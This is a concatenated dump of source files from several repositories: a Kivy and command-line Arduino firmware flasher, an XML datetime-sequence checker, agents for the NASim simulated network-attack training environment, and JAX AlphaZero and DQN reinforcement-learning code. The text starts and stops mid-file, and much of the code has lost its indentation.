pos_hint:{'center_x': .5, 'center_y': .5}
on_release:app.on_flash()
'''
class MainApp(MDApp):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.ih = IntelHex()
self.ab = ArduinoBootloader()
self.working_thread = None
self.progress_queue = Queue(100)
self.protocol = "Stk500v1"
self.baudrate = 115200
def build(self):
return Builder.load_string(KV)
def on_sel_programmer(self, baudrate, protocol):
self.baudrate = baudrate
self.protocol = protocol
def on_flash(self):
del self.ih
try:
self.ih = IntelHex()
self.ih.fromfile(self.root.ids.file_name.text, format='hex')
except FileNotFoundError:
self.root.ids.file_info.text = "File not found"
return
except AddressOverlapError:
self.root.ids.file_info.text = "File with address overlapped"
return
        self.root.ids.file_info.text = "start address: {} - end address: {}".format(self.ih.minaddr(), self.ih.maxaddr())
"""The firmware update is done in a worker thread because the main
thread in Kivy is in charge of updating the widgets."""
self.root.ids.progress.value = 0
self.working_thread = threading.Thread(target=self.thread_flash)
self.working_thread.start()
def thread_flash(self):
"""If the communication with the bootloader through the serial port could be
established, obtains the information of the processor and the bootloader."""
res_val = False
"""First you have to select the communication protocol used by the bootloader of
the Arduino board. The Stk500V1 is the one used by the Nano or Uno, and depending
on the Old or New version, the communication speed varies, for the new one you
have to use 115200 and for the old 57600.
The communication protocol for boards based on Mega 2560 is Stk500v2 at 115200."""
prg = self.ab.select_programmer(self.protocol)
if prg.open(speed=self.baudrate):
if prg.board_request():
self.progress_queue.put(["board_request"])
Clock.schedule_once(self.progress_callback, 1 / 1000)
if prg.cpu_signature():
self.progress_queue.put(["cpu_signature"])
Clock.schedule_once(self.progress_callback, 1 / 1000)
"""Iterate the firmware file into chunks of the page size in bytes, and
use the write flash command to update the cpu."""
for address in range(0, self.ih.maxaddr(), self.ab.cpu_page_size):
buffer = self.ih.tobinarray(start=address, size=self.ab.cpu_page_size)
res_val = prg.write_memory(buffer, address)
if not res_val:
break
self.progress_queue.put(["write", address / self.ih.maxaddr()])
Clock.schedule_once(self.progress_callback, 1 / 1000)
"""If the write was successful, re-iterate the firmware file, and use the
read flash command to update and compare them."""
if res_val:
for address in range(0, self.ih.maxaddr(), self.ab.cpu_page_size):
buffer = self.ih.tobinarray(start=address, size=self.ab.cpu_page_size)
read_buffer = prg.read_memory(address, self.ab.cpu_page_size)
if not len(read_buffer) or (buffer != read_buffer):
res_val = False
break
self.progress_queue.put(["read", address / self.ih.maxaddr()])
Clock.schedule_once(self.progress_callback, 1 / 1000)
self.progress_queue.put(["result", "ok" if res_val else "error", address])
Clock.schedule_once(self.progress_callback, 1 / 1000)
prg.leave_bootloader()
prg.close()
else:
self.progress_queue.put(["open_error"])
Clock.schedule_once(self.progress_callback, 1 / 1000)
def progress_callback(self, dt):
"""In kivy only the main thread can update the widgets. Schedule a clock
event to read the message from the queue and update the progress."""
value = self.progress_queue.get()
if value[0] == "open_error":
self.root.ids.status.text = "Can't open bootloader {} at baudrate {}".format(self.protocol, self.baudrate)
if value[0] == "board_request":
self.root.ids.sw_version.text = self.ab.sw_version
self.root.ids.hw_version.text = self.ab.hw_version
self.root.ids.prg_name.text = self.ab.programmer_name
if value[0] == "cpu_signature":
self.root.ids.cpu_version.text = self.ab.cpu_name
if value[0] == "write":
self.root.ids.status.text = "Writing flash %{:.2f}".format(value[1]*100)
self.root.ids.progress.value = value[1]
if value[0] == "read":
self.root.ids.status.text = "Reading and verifying flash %{:.2f}".format(value[1]*100)
self.root.ids.progress.value = value[1]
if value[0] == "result" and value[1] == "ok":
self.root.ids.status.text = "Download done"
self.root.ids.progress.value = 1
if value[0] == "result" and value[1] == "error":
self.root.ids.status.text = "Error writing"
MainApp().run()
```
#### File: PyArduinoFlash/scripts/arduinoflash.py
```python
VERSION = '0.2.0'
import argparse
import sys
from intelhex import IntelHex
from intelhex import AddressOverlapError, HexRecordError
from arduinobootloader import ArduinoBootloader
import progressbar
parser = argparse.ArgumentParser(description="arduino flash utility")
group = parser.add_mutually_exclusive_group()
parser.add_argument("filename", help="filename in hexadecimal Intel format")
parser.add_argument("--version", action="store_true", help="script version")
parser.add_argument("-b", "--baudrate", type=int, required=True, help="old bootloader (57600) Optiboot (115200)")
parser.add_argument("-p", "--programmer", required=True, help="programmer version - Nano (Stk500v1) Mega (Stk500v2)")
group.add_argument("-r", "--read", action="store_true", help="read the cpu flash memory")
group.add_argument("-u", "--update", action="store_true", help="update cpu flash memory")
args = parser.parse_args()
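# Example invocations (the file names are illustrative):
#   python arduinoflash.py firmware.hex -b 115200 -p Stk500v1 --update
#   python arduinoflash.py dump.hex -b 115200 -p Stk500v2 --read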
if args.version:
print("version {}".format(VERSION))
if args.update:
print("update Arduino firmware with filename: {}".format(args.filename))
elif args.read:
print("read the Arduino firmware and save in filename: {}".format(args.filename))
else:
parser.print_help()
sys.exit()
ih = IntelHex()
ab = ArduinoBootloader()
prg = ab.select_programmer(args.programmer)
if prg is None:
print("programmer version unsupported: {}".format(args.programmer))
sys.exit()
def exit_by_error(msg):
print("\nerror, {}".format(msg))
prg.leave_bootloader()
prg.close()
    sys.exit(1)
if prg.open(speed=args.baudrate):
print("AVR device initialized and ready to accept instructions")
address = 0
if not prg.board_request():
exit_by_error(msg="board request")
print("bootloader: {} version: {} hardware version: {}".format(ab.programmer_name,\
ab.sw_version, ab.hw_version))
if not prg.cpu_signature():
exit_by_error(msg="cpu signature")
print("cpu name: {}".format(ab.cpu_name))
if args.update:
print("reading input file: {}".format(args.filename))
try:
ih.fromfile(args.filename, format='hex')
except FileNotFoundError:
exit_by_error(msg="file not found")
except (AddressOverlapError, HexRecordError):
            exit_by_error(msg="file format")
print("writing flash: {} bytes".format(ih.maxaddr()))
bar = progressbar.ProgressBar(max_value=ih.maxaddr(), prefix="writing ")
bar.start(init=True)
for address in range(0, ih.maxaddr(), ab.cpu_page_size):
buffer = ih.tobinarray(start=address, size=ab.cpu_page_size)
if not prg.write_memory(buffer, address):
exit_by_error(msg="writing flash memory")
bar.update(address)
bar.finish()
dict_hex = dict()
if args.update:
max_address = ih.maxaddr()
print("reading and verifying flash memory")
elif args.read:
max_address = int(ab.cpu_page_size * ab.cpu_pages)
print("reading flash memory")
else:
max_address = 0
bar = progressbar.ProgressBar(max_value=max_address, prefix="reading ")
bar.start(init=True)
for address in range(0, max_address, ab.cpu_page_size):
read_buffer = prg.read_memory(address, ab.cpu_page_size)
if read_buffer is None:
exit_by_error(msg="reading flash memory")
if args.update:
if read_buffer != ih.tobinarray(start=address, size=ab.cpu_page_size):
exit_by_error(msg="file not match")
elif args.read:
for i in range(0, ab.cpu_page_size):
dict_hex[address + i] = read_buffer[i]
bar.update(address)
bar.finish()
if args.read:
dict_hex["start_addr"] = 0
ih.fromdict(dict_hex)
try:
ih.tofile(args.filename, 'hex')
except FileNotFoundError:
exit_by_error(msg="the file cannot be created")
print("\nflash done, thank you")
prg.leave_bootloader()
prg.close()
else:
print("error, could not connect with arduino board - baudrate: {}".format(args.baudrate))
``` |
{
"source": "jjsch-dev/xml-check-datetime",
"score": 3
} |
#### File: jjsch-dev/xml-check-datetime/xml_datetime.py
```python
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
from datetime import datetime
import argparse
import os
import platform
import json
parser = argparse.ArgumentParser(description="xml/text date time parser")
parser.add_argument('--version', action='version', version='%(prog)s 0.1.8')
parser.add_argument("-f", "--filename", required=True, help="input filename; the XML parser is used when the extension is .xml, a plain-text parser when it is .txt")
parser.add_argument('--card_id', dest='card_id', action='store_true', help="looks for identifiers out of sequence.")
parser.add_argument('--event_code', dest='event_code', action='store_true', help="verify that the event code is accepted.")
parser.add_argument("--gen_csv", dest='gen_csv', action='store_true', help="build a csv file, with the records plus an error field.")
parser.set_defaults(card_id=False, event_code=False, gen_csv=False)
args = parser.parse_args()
dt_last = None
records = 0
invalid = []
datetime_out_sequence = []
id_out_sequence = []
invalid_event_code = []
source_dict = {}
error_fmt_numeric = False
def parse_xml(file_name, file_extension):
global records, invalid, error_fmt_numeric
try:
tree = ET.parse(file_name + file_extension)
root = tree.getroot()
if args.gen_csv:
with open("csv_format.js") as stream:
line = stream.read()
csv_format = json.loads(line)
if "error" in csv_format["fields"]:
error_fmt_numeric = False if csv_format["fields"]["error"] == "string" else True
csv_fd = csv_open(file_name)
if csv_fd is None:
print("error, the csv output file could not be created.")
exit(0)
for mark in root.findall('mark'):
card_id = int(mark.find('access_id').text)
date_time = mark.find('datetime')
source = int(mark.find("source").text)
event_code = int(mark.find("event_code").text)
year = int(date_time.find('year').text)
month = int(date_time.find('month').text)
day = int(date_time.find('day').text)
hour = int(date_time.find('hour').text)
minute = int(date_time.find('minute').text)
seconds = int(date_time.find('seconds').text)
records += 1
error = check_datetime(card_id=card_id, year=year, month=month,
day=day, hour=hour, minute=minute, seconds=seconds)
if args.card_id:
error += check_card_id(card_id=card_id, source=source)
if args.event_code:
error += check_event_code(card_id=card_id, event_code=event_code)
if args.gen_csv:
csv_append(fd=csv_fd, card_id=card_id, year=year, month=month,
day=day, hour=hour, minute=minute, seconds=seconds,
source=source, event_code=event_code, error=error,
layout=csv_format)
if args.gen_csv:
csv_close(fd=csv_fd)
except FileNotFoundError:
print("error, file not found")
def check_datetime(card_id, year, month, day, hour, minute, seconds):
global dt_last, invalid, datetime_out_sequence, records, error_fmt_numeric
error = ""
str_log = "mark:{} id:{} year:{} "\
"month:{} day:{} hour:{} "\
"minute:{} seconds: {}".format(records,
card_id,
year,
month,
day,
hour,
minute,
seconds)
try:
dt = datetime(year=int(year), month=int(month),
day=int(day), hour=int(hour),
minute=int(minute), second=int(seconds))
if dt_last is None:
dt_last = dt
elif dt < dt_last:
datetime_out_sequence.append(str_log)
error = '2' if error_fmt_numeric else "date_sequence"
dt_last = dt
except ValueError:
invalid.append(str_log)
error = '3' if error_fmt_numeric else "dt_invalid"
return error
def check_card_id(card_id, source):
global source_dict, records, error_fmt_numeric
error = ''
if source in source_dict:
last_id = source_dict[source]
if int(card_id) != int(last_id) + 1:
id_out_sequence.append("mark: {} id: {} source :{}".format(records, card_id, source))
error = ' 4' if error_fmt_numeric else ' id_sequence'
source_dict[source] = card_id
return error
def check_event_code(card_id, event_code):
global invalid_event_code, error_fmt_numeric
if event_code != 1:
invalid_event_code.append("mark: {} id: {} event_code :{}".format(records, card_id, event_code))
return ' 5' if error_fmt_numeric else ' event_code'
return ''
def parse_text(name):
global records, invalid
try:
with open(name) as f:
lines = f.readlines() # list containing lines of file
for line in lines:
line = line.strip() # remove leading/trailing white spaces
columns = [item.strip() for item in line.split(' ')]
dt = columns[1].split('/')
tm = columns[2].split(':')
records += 1
check_datetime(card_id=columns[0],
year=dt[2], month=dt[1], day=dt[0],
hour=tm[0], minute=tm[1], seconds=tm[2])
except FileNotFoundError:
        print("error, file not found")
def csv_open(file_name):
try:
return open(file_name + ".csv", 'w')
except FileNotFoundError:
return None
except PermissionError:
return None
def csv_append(fd, card_id, year, month, day, hour, minute, seconds, source, event_code, error, layout):
global error_fmt_numeric
if len(error) == 0:
error = "1" if error_fmt_numeric else "ok"
fields = layout["fields"]
for item in fields:
if item == 'index':
fd.write(fields[item].format(records))
elif item == "card_id":
fd.write(fields[item].format(card_id))
elif item == "source":
fd.write(fields[item].format(source))
elif item == "event_code":
fd.write(fields[item].format(event_code))
elif item == "error":
fd.write(error.lstrip(' '))
elif item == "date":
date = fields[item]
for x in date:
if x == "month":
fd.write(date[x].format(month))
elif x == "year":
fd.write(date[x].format(year))
elif x == "day":
fd.write(date[x].format(day))
if x != list(date)[-1] and x != "sep":
fd.write(date["sep"])
elif item == "time":
date = fields[item]
for x in date:
if x == "hour":
fd.write(date[x].format(hour))
elif x == "minute":
fd.write(date[x].format(minute))
elif x == "seconds":
fd.write(date[x].format(seconds))
if x != list(date)[-1] and x != "sep":
fd.write(date["sep"])
if item != list(fields)[-1]:
fd.write(layout["sep"])
fd.write("\n")
def csv_close(fd):
    fd.close()
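# An illustrative csv_format.js layout, inferred from how csv_append walks the
# "fields" mapping (the exact format strings are assumptions):
# {
#   "sep": ";",
#   "fields": {
#     "index": "{}",
#     "card_id": "{}",
#     "date": {"sep": "/", "day": "{:02d}", "month": "{:02d}", "year": "{}"},
#     "time": {"sep": ":", "hour": "{:02d}", "minute": "{:02d}", "seconds": "{:02d}"},
#     "source": "{}",
#     "event_code": "{}",
#     "error": "numeric"
#   }
# }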
if __name__ == '__main__':
print("\nos: {} - arch: {} - cpu: {}\n".format(platform.system(),
platform.architecture(),
platform.processor()))
file_name, file_extension = os.path.splitext(args.filename)
if file_extension == ".xml":
parse_xml(file_name, file_extension)
elif file_extension == ".txt":
parse_text(args.filename)
else:
print("error, invalid file extension: {}".format(file_extension))
exit(0)
if len(invalid):
print("invalid datetime\n")
for item in invalid:
print(item)
if len(datetime_out_sequence):
print("\ndatetime out of sequence\n")
for item in datetime_out_sequence:
print(item)
if len(id_out_sequence):
print("\nid out of sequence\n")
for item in id_out_sequence:
print(item)
if len(invalid_event_code):
print("\ninvalid event code\n")
for item in invalid_event_code:
print(item)
print("\nfrom {} records, {} have invalid datetime, "
"{} dates are out of sequence, "
"{} id out of sequence and "
"{} invalid event code".format(records,
len(invalid),
len(datetime_out_sequence),
len(id_out_sequence),
len(invalid_event_code)))
``` |
{
"source": "Jjschwartz/CyberAttackSimulator",
"score": 3
} |
#### File: nasim/agents/bruteforce_agent.py
```python
from itertools import product
import nasim
LINE_BREAK = "-"*60
def run_bruteforce_agent(env, step_limit=1e6, verbose=True):
"""Run bruteforce agent on nasim environment.
Parameters
----------
env : nasim.NASimEnv
the nasim environment to run agent on
step_limit : int, optional
the maximum number of steps to run agent for (default=1e6)
verbose : bool, optional
whether to print out progress messages or not (default=True)
Returns
-------
int
timesteps agent ran for
float
        the total reward received by the agent
bool
whether the goal was reached or not
"""
if verbose:
print(LINE_BREAK)
print("STARTING EPISODE")
print(LINE_BREAK)
print("t: Reward")
env.reset()
total_reward = 0
done = False
steps = 0
cycle_complete = False
if env.flat_actions:
act = 0
else:
act_iter = product(*[range(n) for n in env.action_space.nvec])
while not done and steps < step_limit:
if env.flat_actions:
act = (act + 1) % env.action_space.n
cycle_complete = (steps > 0 and act == 0)
else:
try:
act = next(act_iter)
cycle_complete = False
except StopIteration:
act_iter = product(*[range(n) for n in env.action_space.nvec])
act = next(act_iter)
cycle_complete = True
_, rew, done, _ = env.step(act)
total_reward += rew
if cycle_complete and verbose:
print(f"{steps}: {total_reward}")
steps += 1
if done and verbose:
print(LINE_BREAK)
print("EPISODE FINISHED")
print(LINE_BREAK)
print(f"Goal reached = {env.goal_reached()}")
print(f"Total steps = {steps}")
print(f"Total reward = {total_reward}")
elif verbose:
print(LINE_BREAK)
print("STEP LIMIT REACHED")
print(LINE_BREAK)
if done:
done = env.goal_reached()
return steps, total_reward, done
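# Usage sketch (the benchmark scenario name and make_benchmark defaults are
# assumptions):
#   env = nasim.make_benchmark("tiny")
#   steps, total_reward, goal = run_bruteforce_agent(env, step_limit=10000)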
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("env_name", type=str, help="benchmark scenario name")
parser.add_argument("-s", "--seed", type=int, default=0,
help="random seed")
parser.add_argument("-o", "--partially_obs", action="store_true",
help="Partially Observable Mode")
parser.add_argument("-p", "--param_actions", action="store_true",
help="Use Parameterised action space")
parser.add_argument("-f", "--box_obs", action="store_true",
help="Use 2D observation space")
args = parser.parse_args()
nasimenv = nasim.make_benchmark(
args.env_name,
args.seed,
not args.partially_obs,
not args.param_actions,
not args.box_obs
)
if not args.param_actions:
print(nasimenv.action_space.n)
else:
print(nasimenv.action_space.nvec)
run_bruteforce_agent(nasimenv)
```
#### File: nasim/agents/keyboard_agent.py
```python
import nasim
from nasim.envs.action import Exploit, PrivilegeEscalation
LINE_BREAK = "-"*60
LINE_BREAK2 = "="*60
def print_actions(action_space):
for a in range(action_space.n):
print(f"{a} {action_space.get_action(a)}")
print(LINE_BREAK)
def choose_flat_action(env):
print_actions(env.action_space)
while True:
try:
idx = int(input("Choose action number: "))
action = env.action_space.get_action(idx)
print(f"Performing: {action}")
return action
except Exception:
print("Invalid choice. Try again.")
def display_actions(actions):
action_names = list(actions)
for i, name in enumerate(action_names):
a_def = actions[name]
output = [f"{i} {name}:"]
output.extend([f"{k}={v}" for k, v in a_def.items()])
print(" ".join(output))
def choose_item(items):
while True:
try:
idx = int(input("Choose number: "))
return items[idx]
except Exception:
print("Invalid choice. Try again.")
def choose_param_action(env):
print("1. Choose Action Type:")
print("----------------------")
for i, atype in enumerate(env.action_space.action_types):
print(f"{i} {atype.__name__}")
while True:
try:
atype_idx = int(input("Choose index: "))
# check idx valid
atype = env.action_space.action_types[atype_idx]
break
except Exception:
print("Invalid choice. Try again.")
print("------------------------")
print("2. Choose Target Subnet:")
print("------------------------")
num_subnets = env.action_space.nvec[1]
while True:
try:
subnet = int(input(f"Choose subnet in [1, {num_subnets}]: "))
if subnet < 1 or subnet > num_subnets:
raise ValueError()
break
except Exception:
print("Invalid choice. Try again.")
print("----------------------")
print("3. Choose Target Host:")
print("----------------------")
num_hosts = env.scenario.subnets[subnet]
while True:
try:
host = int(input(f"Choose host in [0, {num_hosts-1}]: "))
if host < 0 or host > num_hosts-1:
raise ValueError()
break
except Exception:
print("Invalid choice. Try again.")
# subnet-1, since action_space handles exclusion of internet subnet
avec = [atype_idx, subnet-1, host, 0, 0]
if atype not in (Exploit, PrivilegeEscalation):
action = env.action_space.get_action(avec)
print("----------------")
print(f"ACTION SELECTED: {action}")
return action
target = (subnet, host)
if atype == Exploit:
print("------------------")
print("4. Choose Exploit:")
print("------------------")
exploits = env.scenario.exploits
display_actions(exploits)
e_name = choose_item(list(exploits))
action = Exploit(name=e_name, target=target, **exploits[e_name])
else:
print("------------------")
print("4. Choose Privilege Escalation:")
print("------------------")
privescs = env.scenario.privescs
display_actions(privescs)
pe_name = choose_item(list(privescs))
action = PrivilegeEscalation(
name=pe_name, target=target, **privescs[pe_name]
)
print("----------------")
print(f"ACTION SELECTED: {action}")
return action
def choose_action(env):
    input("Press enter to choose the next action...")
print("\n" + LINE_BREAK2)
print("CHOOSE ACTION")
print(LINE_BREAK2)
if env.flat_actions:
return choose_flat_action(env)
return choose_param_action(env)
def run_keyboard_agent(env, render_mode="readable"):
"""Run Keyboard agent
Parameters
----------
env : NASimEnv
the environment
render_mode : str, optional
display mode for environment (default="readable")
Returns
-------
int
final return
int
steps taken
bool
whether goal reached or not
"""
print(LINE_BREAK2)
print("STARTING EPISODE")
print(LINE_BREAK2)
o = env.reset()
env.render(render_mode)
total_reward = 0
total_steps = 0
done = False
while not done:
a = choose_action(env)
o, r, done, _ = env.step(a)
total_reward += r
total_steps += 1
print("\n" + LINE_BREAK2)
        print("OBSERVATION RECEIVED")
print(LINE_BREAK2)
env.render(render_mode)
print(f"Reward={r}")
print(f"Done={done}")
print(LINE_BREAK)
if done:
done = env.goal_reached()
return total_reward, total_steps, done
def run_generative_keyboard_agent(env, render_mode="readable"):
"""Run Keyboard agent in generative mode.
The experience is the same as the normal mode, this is mainly useful
for testing.
Parameters
----------
env : NASimEnv
the environment
render_mode : str, optional
display mode for environment (default="readable")
Returns
-------
int
final return
int
steps taken
bool
whether goal reached or not
"""
print(LINE_BREAK2)
print("STARTING EPISODE")
print(LINE_BREAK2)
o = env.reset()
s = env.current_state
env.render_state(render_mode, s)
env.render(render_mode, o)
total_reward = 0
total_steps = 0
done = False
while not done:
a = choose_action(env)
ns, o, r, done, _ = env.generative_step(s, a)
total_reward += r
total_steps += 1
print(LINE_BREAK2)
print("NEXT STATE")
print(LINE_BREAK2)
env.render_state(render_mode, ns)
print("\n" + LINE_BREAK2)
        print("OBSERVATION RECEIVED")
print(LINE_BREAK2)
env.render(render_mode, o)
print(f"Reward={r}")
print(f"Done={done}")
print(LINE_BREAK)
s = ns
if done:
done = env.goal_reached()
return total_reward, total_steps, done
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("env_name", type=str,
help="benchmark scenario name")
parser.add_argument("-s", "--seed", type=int, default=None,
help="random seed (default=None)")
parser.add_argument("-o", "--partially_obs", action="store_true",
help="Partially Observable Mode")
parser.add_argument("-p", "--param_actions", action="store_true",
help="Use Parameterised action space")
parser.add_argument("-g", "--use_generative", action="store_true",
help=("Generative environment mode. This makes no"
" difference for the player, but is useful"
" for testing."))
args = parser.parse_args()
env = nasim.make_benchmark(args.env_name,
args.seed,
fully_obs=not args.partially_obs,
flat_actions=not args.param_actions,
flat_obs=True)
if args.use_generative:
total_reward, steps, goal = run_generative_keyboard_agent(env)
else:
total_reward, steps, goal = run_keyboard_agent(env)
print(LINE_BREAK2)
print("EPISODE FINISHED")
print(LINE_BREAK)
print(f"Goal reached = {goal}")
print(f"Total reward = {total_reward}")
print(f"Steps taken = {steps}")
```
#### File: nasim/agents/random_agent.py
```python
import numpy as np
import nasim
LINE_BREAK = "-"*60
def run_random_agent(env, step_limit=1e6, verbose=True):
if verbose:
print(LINE_BREAK)
print("STARTING EPISODE")
print(LINE_BREAK)
        print("t: Reward")
env.reset()
total_reward = 0
done = False
t = 0
while not done and t < step_limit:
a = env.action_space.sample()
_, r, done, _ = env.step(a)
total_reward += r
if (t+1) % 100 == 0 and verbose:
print(f"{t}: {total_reward}")
t += 1
if done and verbose:
print(LINE_BREAK)
print("EPISODE FINISHED")
print(LINE_BREAK)
print(f"Total steps = {t}")
print(f"Total reward = {total_reward}")
elif verbose:
print(LINE_BREAK)
print("STEP LIMIT REACHED")
print(LINE_BREAK)
if done:
done = env.goal_reached()
return t, total_reward, done
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("env_name", type=str,
help="benchmark scenario name")
parser.add_argument("-s", "--seed", type=int, default=0,
help="random seed")
parser.add_argument("-r", "--runs", type=int, default=1,
help="number of random runs to perform (default=1)")
parser.add_argument("-o", "--partially_obs", action="store_true",
help="Partially Observable Mode")
parser.add_argument("-p", "--param_actions", action="store_true",
help="Use Parameterised action space")
parser.add_argument("-f", "--box_obs", action="store_true",
help="Use 2D observation space")
args = parser.parse_args()
seed = args.seed
run_steps = []
run_rewards = []
run_goals = 0
for i in range(args.runs):
env = nasim.make_benchmark(args.env_name,
seed,
not args.partially_obs,
not args.param_actions,
not args.box_obs)
steps, reward, done = run_random_agent(env, verbose=False)
run_steps.append(steps)
run_rewards.append(reward)
run_goals += int(done)
seed += 1
if args.runs > 1:
print(f"Run {i}:")
print(f"\tSteps = {steps}")
print(f"\tReward = {reward}")
print(f"\tGoal reached = {done}")
run_steps = np.array(run_steps)
run_rewards = np.array(run_rewards)
print(LINE_BREAK)
print("Random Agent Runs Complete")
print(LINE_BREAK)
print(f"Mean steps = {run_steps.mean():.2f} +/- {run_steps.std():.2f}")
print(f"Mean rewards = {run_rewards.mean():.2f} "
f"+/- {run_rewards.std():.2f}")
print(f"Goals reached = {run_goals} / {args.runs}")
``` |
{
"source": "Jjschwartz/rljaxforfun",
"score": 3
} |
#### File: rljaxff/alpha_zero/agent.py
```python
from typing import Mapping
import jax
import jax.numpy as jnp
import numpy as np
import optax
from absl import logging
from rljaxff import parts
from rljaxff.alpha_zero import mcts as mcts_lib
from rljaxff.alpha_zero import memory as memory_lib
class AlphaZero(parts.Agent):
"""An Alpha zero agent """
def __init__(self,
mcts: mcts_lib.MCTS,
sample_network_input,
network: parts.Network,
optimizer: optax.GradientTransformation,
replay: memory_lib.AlphaZeroReplay,
batch_size: int,
min_replay_capacity: int,
learn_period: int,
rng_key: parts.PRNGKey):
self._mcts = mcts
self._replay = replay
self._batch_size = batch_size
self._min_replay_capacity = min_replay_capacity
self._learn_period = learn_period
# Network stuff
self._rng_key, net_key = jax.random.split(rng_key) # type: ignore
self._params = network.init(net_key, sample_network_input[None, ...])
self._opt_state = optimizer.init(self._params)
# Agent state stuff
self._action: parts.Action = 0
self._frame_t = -1
self._statistics = {
'state_value': np.nan,
'loss_value': np.nan
}
def loss_fn(params: parts.NetworkParams,
transitions,
rng_key: parts.PRNGKey):
_, apply_key = jax.random.split(rng_key)
predictions = network.apply(
params, rng=apply_key, inputs=transitions.s_t)
predicted_v_t = jnp.squeeze(predictions.value)
v_loss = jnp.mean((predicted_v_t - transitions.v_t)**2)
            pi_loss = -jnp.mean(jnp.sum(
                transitions.pi_t * jnp.log(predictions.action_probs + 1e-8),
                axis=-1
            ))
# The paper also adds an L2 weight regularizer penalty
# Gonna ignore that for now
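            # A sketch of that penalty with an assumed coefficient (the 1e-4
            # below is illustrative, not taken from the paper):
            #   l2 = 1e-4 * sum(jnp.sum(jnp.square(p))
            #                   for p in jax.tree_util.tree_leaves(params))
            #   return v_loss + pi_loss + l2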
return v_loss + pi_loss
def update(rng_key: parts.PRNGKey,
opt_state,
params: parts.NetworkParams,
transitions):
rng_key, update_key = jax.random.split(rng_key) # type: ignore
loss_value, d_loss_d_params = jax.value_and_grad(loss_fn)(
params, transitions, update_key
)
updates, new_opt_state = optimizer.update(
d_loss_d_params, opt_state
)
new_params = optax.apply_updates(params, updates)
return rng_key, new_opt_state, new_params, loss_value
self._update = jax.jit(update)
def step(self, timestep: parts.Timestep) -> parts.Action:
self._frame_t += 1
action = self._action = self._act(timestep)
if self._replay.size < self._min_replay_capacity:
return action
if self._frame_t % self._learn_period == 0:
self._learn()
return action
def reset(self) -> None:
self._action = 0
def _act(self, timestep: parts.Timestep) -> parts.Action:
if timestep.first():
# new episode
self._mcts.reset(timestep.observation, self._params)
else:
self._mcts.update(self._action, timestep.observation, self._params)
if timestep.last():
pi_t = np.zeros(2) # this will not be used for training or acting
v_t = 0.0 if timestep.reward is None else timestep.reward
a_t = 0
else:
pi_t, v_t = self._mcts.search(self._params, self.temperature)
a_t = np.random.choice(len(pi_t), p=pi_t)
self._replay.add(memory_lib.AlphaZeroReplayStructure(
s_t=timestep.observation,
v_t=0.0 if timestep.reward is None else timestep.reward,
pi_t=pi_t,
last_step=timestep.last()
))
self._statistics['state_value'] = v_t
return a_t
def _learn(self):
logging.log_first_n(logging.INFO, 'Begin learning', 1)
transitions = self._replay.sample(self._batch_size)
self._rng_key, self._opt_state, self._params, loss = self._update(
self._rng_key, self._opt_state, self._params, transitions
)
self._statistics["loss_value"] = jax.device_get(loss)
@property
def statistics(self) -> Mapping[str, float]:
return self._statistics
@property
def temperature(self) -> float:
"""Exploration temperature for MCTS search """
return 1.0
```
#### File: rljaxff/alpha_zero/network_test.py
```python
import sys
import jax
import jax.numpy as jnp
import chex
import numpy as np
import haiku as hk
from absl.testing import absltest
import rljaxff.alpha_zero.network as net_lib
# pylint: disable=missing-class-docstring
# pylint: disable=missing-function-docstring
# pylint: disable=protected-access
def _sample_input(input_shape):
return jnp.zeros((1,) + input_shape, dtype=jnp.float32)
class AZNetworkTest(absltest.TestCase):
def setUp(self):
self.input_size = (6, )
self.num_actions = 3
self.hidden_sizes = [5, 4]
self.seed = 0
random_state = np.random.RandomState(self.seed)
self.rng_key = jax.random.PRNGKey(
random_state.randint(
-sys.maxsize - 1, sys.maxsize + 1, dtype=np.int64
)
)
network_fn = net_lib.alphazero_network(
self.hidden_sizes, self.num_actions
)
self.network = hk.transform(network_fn)
def test_init(self):
params = self.network.init(
self.rng_key, _sample_input(self.input_size)
)
self.assertLen(params, 2*len(self.hidden_sizes))
def test_apply(self):
inputs = _sample_input(self.input_size)
params = self.network.init(
self.rng_key, _sample_input(self.input_size)
)
output = self.network.apply(params, self.rng_key, inputs)
chex.assert_shape(output.value[0], (1, ))
chex.assert_shape(output.action_probs[0], (self.num_actions, ))
def test_apply_batch(self):
batch_size = 8
inputs = jnp.zeros((batch_size,) + self.input_size, dtype=jnp.float32)
params = self.network.init(
self.rng_key, _sample_input(self.input_size)
)
outputs = self.network.apply(params, self.rng_key, inputs)
chex.assert_shape(outputs.value, (batch_size, 1))
chex.assert_shape(outputs.action_probs, (batch_size, self.num_actions))
if __name__ == "__main__":
absltest.main()
```
#### File: rljaxff/dqn/run_gym.py
```python
import sys
import itertools
import gym
import jax
from jax.config import config
import numpy as np
import haiku as hk
from absl import app
from absl import flags
from absl import logging
import optax
from rljaxff import parts
from rljaxff.dqn import agent
from rljaxff import replay as replay_lib
FLAGS = flags.FLAGS
flags.DEFINE_string('environment_name', 'CartPole-v0', '')
flags.DEFINE_multi_integer('hidden_size', 64, '')
flags.DEFINE_integer('replay_capacity', int(1e5), '')
flags.DEFINE_float('min_replay_capacity_fraction', 0.00001, '')
flags.DEFINE_integer('batch_size', 32, '')
flags.DEFINE_integer('max_frames_per_episode', 1024, '')
flags.DEFINE_float('exploration_epsilon_begin_value', 1., '')
flags.DEFINE_float('exploration_epsilon_end_value', 0.1, '')
flags.DEFINE_float('exploration_epsilon_decay_frame_fraction', 0.01, '')
flags.DEFINE_integer('target_network_update_period', int(1e3), '')
flags.DEFINE_float('learning_rate', 0.001, '')
flags.DEFINE_float('optimizer_epsilon', 0.01 / 32**2, '')
flags.DEFINE_float('additional_discount', 0.99, '')
flags.DEFINE_integer('seed', 1, '') # GPU may introduce nondeterminism.
flags.DEFINE_integer('num_iterations', 200, '')
flags.DEFINE_integer('num_train_frames', int(1e4), '') # Per iteration.
flags.DEFINE_integer('learn_period', 1, '')
flags.DEFINE_float('grad_error_bound', 1. / 4, '')
flags.DEFINE_float('discount', 0.9, '')
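# Example run (the module path is an assumption based on this file's location):
#   python -m rljaxff.dqn.run_gym --environment_name CartPole-v0 --num_iterations 10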
def main(argv):
"""Trains DQN agent on Gym environment """
del argv
logging.info(
'DQN on OpenAI Gym on %s.', jax.lib.xla_bridge.get_backend().platform
)
random_state = np.random.RandomState(FLAGS.seed)
rng_key = jax.random.PRNGKey(
